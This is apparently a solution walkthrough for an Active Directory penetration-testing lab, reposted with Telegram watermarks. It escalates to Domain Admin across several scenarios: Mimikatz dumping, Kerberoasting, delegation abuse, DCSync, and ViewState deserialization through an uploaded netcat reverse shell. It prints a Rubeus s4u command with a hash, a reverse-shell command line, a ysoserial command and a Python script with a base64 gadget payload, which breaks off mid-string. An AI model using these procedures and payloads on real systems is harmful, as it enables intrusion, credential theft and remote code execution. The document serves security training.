https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

policies update (within the next 90 minutes by

default).

Disable the Antivirus (Windows Defender) to

ensure that our activities don't trigger any
alerts on detected suspicious/malicious activity
on the machine.

Now, let's go back to "Johhny". Since the user is

logged on to the machine, we can perform a
credential dumping attack to extract his password
either in plaintext or at least the password
hashes (depending on the settings applied to the
machine!). Our preferred method is to perform a
mini dump and then use Mimikatz to parse the
memory dump. By doing so, we get the following:

We can then use the password hash to obtain a

Kerberos ticket as "Johnny" using Rubeus:

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Now that we are impersonating "Johnny", we can

follow the attack path discovered by BloodHound.
The next step is a "GenericWrite" permission that
"Johnny" has to the user "Exch_adm". With these
rights, we can register a SPN for the user
"Exch_adm", which will give us the possibility to
perform a targeted Kerberoasting attack against
that user and crack their password offline
afterwards with Hashcat. To register an SPN, we
execute the following command (ensure that you
are running the shell executing setspn as user
Johnny!]:

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

We then run the Kerberoast attack for the user

"exch_adm":

Finally, we provide the obtained hashes to

Hashcat to crack them offline and obtain the
plain text password of "exch_adm":

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

We successfully recovered the password of

"exch_adm", which is "Qwerty1".

Following the path from BloodHound, "exch_adm"

due to his membership of "SG_AzureSync" has
"WriteDACL" permissions on the domain object
"els.bank". This in fact, gives "exch_adm" the
permissions to assign any privileges to that
object to any user. Using Rubeus (similarly to
earlier), we can obtain a ticket for "exch_adm"
and assign him the permissions "Replicate
Directory Changes" and "Replicate Directory
Changes All", which are necessary to perform
DCSync. Assuming we just executed Rubeus, we
should be able to see a similar output:

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Assigning the rights can be achieved with

PowerView (although workstation01 is set to run
PowerShell in ConstrainedLanguage, you can bypass
it in this case by executing "setx
__PSLockdownPolicy 0 /m" from an elevated
prompt):

With the DCSync permissions assigned, we can

extract the password hashes of any/all Domain
users by using Mimikatz. In the following
picture, we extract the password hash of the
"Administrator" account of the domain:

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

We can use the hash value with Rubeus to

authenticate as the Administrator and access
Bank-DC:

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Task 2: Scenario 2 - Constrained Delegation{.smallcaps}

A common escalation technique in Active Directory

environments is through identifying plaintext
credentials in script files that are placed on
network shares. The obvious location is the
SYSVOL folder of the domain, although other
servers' shares are also important (SCCM, IT
Folders etc. which often have weak permissions
and every domain user can access them). In this
scenario, we'll scan SYSVOL for stored passwords
in file types such as .bat, .cmd, .cmdline, .ps1,
.config, .conf, .properties and .vbs. Many tools
have this functionality, including built-in ones
such as "findstr". Scanning through the share, we

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

locate a single batch file which contains the

following:

Let's query Active Directory for information

about the user whose password we just found:

It seems that the user is

TRUSTED_TO_AUTH_FOR_DELEGATION (useraccesscontrol
property) to the server Dev01.els.bank

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

(msds-allowedtodelegateto property). This is

configured for constrained delegation, and can be
abused with Rubeus, where we can impersonate any
user of our choosing to login to that server with
(except those in the group "Protected Users" or
accounts with the "This account is sensitive and
cannot be delegated" right). Unfortunately for
us, all Domain administrators are members of the
"Protected Users" group, so we can't directly
impersonate them. Let's look for users who may be
local administrators on that server instead.
Based on the naming conventions of AD groups that
may have that privilege, we see the group
"DEV01_ADMINS", whose member is "Developer1":

Let's impersonate that user, and use also

protocol transition from the initial 'HOST'
service, to 'HTTP', which will give us the rights
to perform PSRemoting to that server and hence
remote code execution (the first command is
executed because we need to provide a hash value
to Rubeus):

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

To ensure that everything went as planned, let's

check if we have a ticket for "Developer1":

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

This is great! The ticket is active and the

service is HTTP as specified in the "/altservice"
parameter. We can now utilize PSRemoting to
connect to the host:

Now that we have administrative access to Dev01,

we can perform enumeration of that server
locally. Even though we have administrative
rights, there is a folder "C:\app", whose content
we cannot read. To view its permissions, we can
utilize "Get-Acl":

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

A local account 'Tester', a domain account

'slavi-adm' and members of the group 'Developers'
are allowed access. Our best bet at this point is
the local account "Tester", since we have
administrative rights to the server. We can
extract the password hashes of that account from
the registry hive on the machine, or since we
have administrative rights we can also
force-change its password. We will change the
password and also add the account to the local
administrators group, as follows:

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Now we can login to the server with that account

and head to C:\app to identify what is stored in
that folder. It appears that it contains these
files:

If we look through the files, connect.properties

appears to contain a user name and a PowerShell
SecureString object as encrypted password in that
file:

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

The file key.txt appears to contain the key used

for the encryption in the PowerShell SecureString
function. Using it, we can decrypt the value:

According to the data in BloodHound, the user

"ronni" has "GenericAll" over "Domain Admins"
(because this user is added to the AdminSDHolder
property). We can use "ronni" to add any user
(e.g. analyst1) to the group "Domain admins":

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

NOTE: this command prompt was spawned on

workstation01 through "runas", instead of Dev01
because "ronni" does not have privileges to
perform that action on the server.

We achieved a successful escalation to Domain

administrator.

Task 3: Scenario 3 - Resource-Based Delegation{.smallcaps}

In this scenario (just as in Scenario 2), we'll

scan only SYSVOL for stored passwords in file
types such as .bat, .cmd, .cmdline, .ps1,
.config, .conf, .properties and .vbs. Scanning
through the share, we'll locate a single batch
file which contains the following:

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Let's query information about the user whose

password we found:

We'll take a note for this user and the

associated properties that we have discovered,

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

specifically note that the user has an SPN

registered.

Next, we'll scan for passwords in AD attributes

of the user objects. We are interested in the
presence of the word "pass" or "pw". Through a
quick search, we identify that the user "slavi"
has a match on the description attribute as
follows:

Looking into the permissions of that account in

Bloodhound, we discover that indirectly, the
account has "WriteOwner" permissions on the
Domain Controller AD object:

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

This gives user "slavi" the ability to change

owner of that object. We can use the user to
assign him as the owner of the object, which will
give us access to modifying all other attributes
of that object (being owner gives implicit
GenericAll of the object). One of the interesting
attributes that we can modify is
"msds-allowedtoactonbehalfofotheridentity", which
will enable us to perform a Resource-Based
delegation attack when combined with the user
svc-omada whose password we found in a share
earlier (because this account has an SPN, which
is a prerequisite for this type of attack).

Let's start by changing the owner of the object.

It can be done as follows with PowerView

(PowerShell prompt running as user ELS\slavi):

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Now that the owner is changed, we can assign

ourselves GenericAll permissions:

Finally, the following commands will configure

the necessary steps for assigning the necessary
values to certain attributes that will enable us
to perform the delegation abuse attack:

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

With everything set now, we can utilize Rubeus to

get a ticket for "exch_adm" and assign the DCSync
rights as we did in Scenario 1 (remember that
Domain admins are members of "Protected users" so
we can't simply utilize this attack to get access
to those accounts).

(PowerShell prompt running as user ELS\analyst1)

.\Rubeus.exe s4u /user:svc-omada

/rc4:65F91B600E51F19A80593D0A62047CC5
/impersonateuser:"exch_adm"
/msdsspn:"host/bank-dc.els.bank"
/altservice:ldap,rpc,http,cifs /ptt

*Please also execute the above Rubeus and

PowerView commands inside the previous PowerShell
prompt that is running as user ELS\slavi. Even

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

though this is not required for the attack to be

successful, it may resolve an AD quirk.**

Back to the PowerShell prompt as user

ELS\analyst1, with DCSync rights assigned, we can
utilize Mimikatz and extract the password of the
Administrator for the domain:

Task 4: Scenario 4 - Unconstrained delegation{.smallcaps}

During the reconnaissance phase, we identified

that the user Lisa does not require Kerberos
pre-authentication, therefore, we can perform
Asreproast and offline crack the password. For
the extraction, we'll use Rubeus as follows:

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

With the extracted data, we run hashcat to

recover the plain text password:

Now that we have recovered Lisa's password, we

can use Bloodhound to identify the access she has
in the domain:

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

It appears that Lisa has "GenericAll" permissions

over the UAT Organizational Unit. Querying the
location, we can see that there is a single
server object placed there UAT01. With
"GenericAll" on the OU, we can modify that
permission itself, to also apply on descending
objects in the OU, which means we'll set
ourselves those rights on the computer object
placed in the OU. The following is the execution
of commands through PowerShell and the Microsoft
AD module (DLL available at
https://github.com/samratashok/ADModule) to
achieve that ACL modification (Note this requires
that PowerShell is not in ConstrainedLanguage, so
if you go in this path, you should ensure that
you have escalated your privileges to bypass the
ConstrainedLanguage restriction):

This will grant us access to the LAPS password of

the computer object, which is what can be seen by
running “Get-DomainComputer uat01” after we

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

modified the permission to apply on descending

objects as well:

NOTE - This password value changes dynamically to

another random value, therefore it will be
different in your case.

Now we can use that password to login (and RDP)

as the "Administrator" of the UAT01 server.
Having compromised UAT01 with administrative
privileges, we can look again in the computer
object and see its permissions and assignments.
We can use BloodHound's data representation this
time:

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

The server is trusted for Unconstrained

delegation. We can abuse Unconstrained delegation
to perform the Printer bug and obtain a Kerberos
ticket of the Domain Controller, which can then
be used to perform DCSync. To do that (inside
UAT01), we need to run Rubeus in monitor mode to
capture all incoming tickets and export them to a
file:

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

It is necessary to execute this with SYSTEM

rights, else Rubeus won't be able to export the
tickets. Simply running in administrative shell
will not be enough because the environment has
been hardened to not allow assignment of certain
privileges so requesting "SeDebugPrivilege" will
not be granted even to administrators. In this
case, any functionality similar to PsExec will do
the trick with the escalation.

Once Rubeus is configured, execute the Printer

bug (note that a domain user is required to
trigger it this is why it was executed from a
shell running as Lisa, so don't attempt to run as
the local administrator of UAT01!) It may be

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

necessary that Lisa is added to local

administrators to perform the logon through
"runas"):

With the extracted ticket, we can pass-the-ticket

and verify that we have a valid one for bank-dc:

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Finally, execute DCSync and get the hash of the

Administrator:

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Task 5: Scenario 5 - Shadow Principals{.smallcaps}

During the enumeration phase, we discover that

there is an one-way trust set to "protect.bank"
and a bidirectional trust with "trusted.corp":

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

A quick ping scan detects that protect.bank is

resolved and a machine is answering our requests:

Performing a port scan against the machine,

reveals a Windows server, with open ports that
disclose that it is most likely a Domain
Controller. Additionally, it has port 80 open. By
connecting to it with a browser, we discover the
following application:

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Going through the source code of the application

an interesting to us comment is identified and
additionally, based on some of the parameters
(e.g. __VIEWSTATE), we can tell that this is
ASP.NET web application:

We have an application, which appears to offer

file uploading functionality, filtering on a
blacklist of file types that cannot be uploaded.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

The process now involves a trial and error

approach, where we will attempt to upload
different file types and observe the output to
see which ones are allowed to be uploaded. In
fact, to get anything interesting we will aim to
upload files which are triggered by Server Side
loading (this feature must be enabled on the
remote server, which allows for certain execution
e.g. file include). ViewState deserialization is
our best bet here. For that though, we will need
the machine key that is used for encrypting
ViewState. The machine key may be retrieved
trough an SSI attack
(https://owasp.org/www-community/attacks/Server-S
ide_Includes_(SSI)_Injection).

Let's upload a file containing the following code

(filetype:.shtml) that attempts to read and
return to us the content of the file web.config
through SSI ("..\..\" in the command below is
going back in directories because it appears the
uploaded files are placed in a nested folder and
not in the same directory as the file with the
upload function itself - this was discovered by
uploading a document which presents back to us
the location it was placed in):

<!--#include file="..\..\web.config" -->

Now, let's use burp and start sending that.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Note: that burp is executed through an attacking

Linux machine. Consider that also port proxying
through workstastion01 may be necessary to reach
the server from the attacking Linux machine. The
same for any reverse shells too!):

"shtml" is allowed, and the response provides us

a link to the file on the server:

Request:

Response:

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Let's access the file and observe the response

from the server (which includes the content of
web.config):

The interesting part from the output of the file

is the "machineKey" parameter. This key is used
in the server side checks of the MAC for the
"__VIEWSTATE" parameter in the requests to the
server. With this key, essentially, we can create
our own serialized object and replace the
original value of "VIEWSTATE" to ours, which can
trigger code execution when deserialized.

What we want to trigger is a reverse shell

connecting back to us. We'll use a windows binary
version of netcat, however, this can be any
stager for frameworks like Metasploit etc.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Uploading the file returns the location it was

placed in:

Note that this file was uploaded from

workstation01, therefore the 'stored' location on
the server, refers to that IP address
172.16.80.100, which is different than the IP
address of the uploaded .shtml file earlier,
which was uploaded from our linux machine.

Now that we have netcat uploaded to the server,

we need to generate serialized object and utilize
the machine key to perform MAC signing of the
serialized object. Our payload will be the
following command which creates a reverse shell
back to workstation01 on port 2222:

C:\inetpub/wwwroot/files/172.16.80.100/bdca0e54-4
77a-49e1-9cf4-cfc0b4ea9931.exe 172.16.80.100 2222
-e cmd.exe
To create a serialized object, we'll use
"ysoserial" and pass it the command:

We'll then create a python file that can perform

the MAC signing with the machineKey and paste the

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

serialized object in it. This is the final

version of the script:

#!/usr/bin/env python3
import hashlib
import base64
'''
C:\inetpub/wwwroot/files/172.16.80.100/bdca0e54-4
77a-49e1-9cf4-cfc0b4ea9931.exe 172.16.80.100 2222
-e cmd.exe

#Generate deserialization gadget by ysoserial.net

ysoserial.exe -o base64 -g TypeConfuseDelegate -f
LosFormatter -c
"C:\inetpub/wwwroot/files/172.16.80.100/bdca0e54-
477a-49e1-9cf4-cfc0b4ea9931.exe 172.16.80.100
2222 -e cmd.exe"
'''

serialized_data =
'/wEyqRIAAQAAAP////8BAAAAAAAAAAwCAAAASVN5c3RlbSwg
VmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1Y
mxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkFAQAAAIQBU3
lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuU29ydGVkU2V0YDF
bW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQu
MC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZ
W49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAVDb3VudAhDb21wYX
JlcgdWZXJzaW9uBUl0ZW1zAAMABgiNAVN5c3RlbS5Db2xsZWN
0aW9ucy5HZW5lcmljLkNvbXBhcmlzb25Db21wYXJlcmAxW1tT
eXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuM
C4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPW

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

I3N2E1YzU2MTkzNGUwODldXQgCAAAAAgAAAAkDAAAAAgAAAAk
EAAAABAMAAACNAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmlj
LkNvbXBhcmlzb25Db21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nL
CBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW
5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGU
wODldXQEAAAALX2NvbXBhcmlzb24DIlN5c3RlbS5EZWxlZ2F0
ZVNlcmlhbGl6YXRpb25Ib2xkZXIJBQAAABEEAAAAAgAAAAYGA
AAAcC9jIEM6XGluZXRwdWIvd3d3cm9vdC9maWxlcy8xNzIuMT
YuODAuMTAwL2JkY2EwZTU0LTQ3N2EtNDllMS05Y2Y0LWNmYzB
iNGVhOTkzMS5leGUgMTcyLjE2LjgwLjEwMCAyMjIyIC1lIGNt
ZC5leGUGBwAAAANjbWQEBQAAACJTeXN0ZW0uRGVsZWdhdGVTZ
XJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQdtZXRob2
QwB21ldGhvZDEDAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXp
hdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5L1N5c3RlbS5SZWZs
ZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyL
1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpem
F0aW9uSG9sZGVyCQgAAAAJCQAAAAkKAAAABAgAAAAwU3lzdGV
tLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0
ZUVudHJ5BwAAAAR0eXBlCGFzc2VtYmx5BnRhcmdldBJ0YXJnZ
XRUeXBlQXNzZW1ibHkOdGFyZ2V0VHlwZU5hbWUKbWV0aG9kTm
FtZQ1kZWxlZ2F0ZUVudHJ5AQECAQEBAzBTeXN0ZW0uRGVsZWd
hdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkG
CwAAALACU3lzdGVtLkZ1bmNgM1tbU3lzdGVtLlN0cmluZywgb
XNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZX
V0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg
5XSxbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249
NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb
2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLkRpYWdub3
N0aWNzLlByb2Nlc3MsIFN5c3RlbSwgVmVyc2lvbj00LjAuMC4
wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3
N2E1YzU2MTkzNGUwODldXQYMAAAAS21zY29ybGliLCBWZXJza

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

W9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2
V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OQoGDQAAAElTeXN0ZW0
sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQ
dWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5Bg4AAAAaU
3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MGDwAAAAVTdGFydA
kQAAAABAkAAAAvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5
mb1NlcmlhbGl6YXRpb25Ib2xkZXIHAAAABE5hbWUMQXNzZW1i
bHlOYW1lCUNsYXNzTmFtZQlTaWduYXR1cmUKU2lnbmF0dXJlM
gpNZW1iZXJUeXBlEEdlbmVyaWNBcmd1bWVudHMBAQEBAQADCA
1TeXN0ZW0uVHlwZVtdCQ8AAAAJDQAAAAkOAAAABhQAAAA+U3l
zdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MgU3RhcnQoU3lzdGVt
LlN0cmluZywgU3lzdGVtLlN0cmluZykGFQAAAD5TeXN0ZW0uR
GlhZ25vc3RpY3MuUHJvY2VzcyBTdGFydChTeXN0ZW0uU3RyaW
5nLCBTeXN0ZW0uU3RyaW5nKQgAAAAKAQoAAAAJAAAABhYAAAA
HQ29tcGFyZQkMAAAABhgAAAANU3lzdGVtLlN0cmluZwYZAAAA
K0ludDMyIENvbXBhcmUoU3lzdGVtLlN0cmluZywgU3lzdGVtL
lN0cmluZykGGgAAADJTeXN0ZW0uSW50MzIgQ29tcGFyZShTeX
N0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQgAAAAKARAAAAA
IAAAABhsAAABxU3lzdGVtLkNvbXBhcmlzb25gMVtbU3lzdGVt
